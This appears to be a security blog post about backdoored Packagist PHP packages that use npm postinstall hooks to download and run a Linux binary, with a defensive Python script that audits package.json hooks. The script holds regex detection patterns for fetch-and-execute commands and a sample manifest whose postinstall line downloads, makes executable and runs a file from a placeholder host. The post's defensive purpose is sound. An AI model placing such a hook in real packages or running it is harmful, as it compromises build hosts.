Two related supply chain items this week cover the Packagist and npm ecosystems: an active attack in which eight PHP packages on Packagist were backdoored with npm postinstall hooks that download and execute a Linux ELF binary on build hosts, and a GitHub-released mitigation in the form of npm staged publishing and install-source controls that close two persistent attack vectors the Packagist campaign exploits. Organizations running PHP projects that also use npm for frontend tooling are directly in scope for the active attack; all teams consuming npm packages face the structural risk that TeamPCP is actively exploiting through package poisoning at scale.
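As an added example (not code from the report, from GitHub or from npm), the following heuristic audits the npm lifecycle hooks in package.json files, including ones shipped inside PHP packages under vendor/, and flags the fetch-and-execute pattern described above; the sample manifests and the URL in them are constructed for this illustration.

```python
import json
import os
import re

# Lifecycle hooks npm runs automatically during `npm install` / `npm ci`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators of a fetch-and-run one-liner; tune for your environment.
FETCH_RE = re.compile(r"\b(?:curl|wget)\s|https?://")
EXEC_RE = re.compile(r"chmod\s+\+x|\|\s*(?:ba)?sh\b|\bnode\s+-e\b|child_process|\b(?:exec|spawn)(?:Sync)?\(")


def audit_manifest(manifest_text, path="package.json"):
    """Return (path, hook, reason) findings for one package.json document."""
    try:
        manifest = json.loads(manifest_text)
    except json.JSONDecodeError as exc:
        return [(path, "-", f"unparseable manifest: {exc}")]
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd.strip():
            continue
        fetch, run = FETCH_RE.search(cmd), EXEC_RE.search(cmd)
        if fetch and run:
            findings.append((path, hook, "fetches remote content and executes it"))
        elif fetch:
            findings.append((path, hook, "fetches remote content at install time"))
        elif run:
            findings.append((path, hook, "runs inline or piped code at install time"))
    return findings


def audit_tree(root):
    """Walk a checkout or vendor/ tree (where Composer places PHP packages) and audit every package.json."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            full = os.path.join(dirpath, "package.json")
            with open(full, encoding="utf-8") as fh:
                findings.extend(audit_manifest(fh.read(), full))
    return findings


# Constructed sample manifests; the URL is a placeholder, not an indicator from the report.
SUSPICIOUS = json.dumps({"name": "acme-php-widget", "scripts": {
    "postinstall": "curl -s http://example.invalid/p -o /tmp/p && chmod +x /tmp/p && /tmp/p"}})
BENIGN = json.dumps({"name": "acme-assets", "scripts": {"postinstall": "node scripts/build.js"}})
```

Run `audit_tree("vendor")` after `composer install` and before any `npm install` on the build host, and pair it with `ignore-scripts=true` in the project `.npmrc` so lifecycle hooks never run unreviewed.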

Author

Tech Jacks Solutions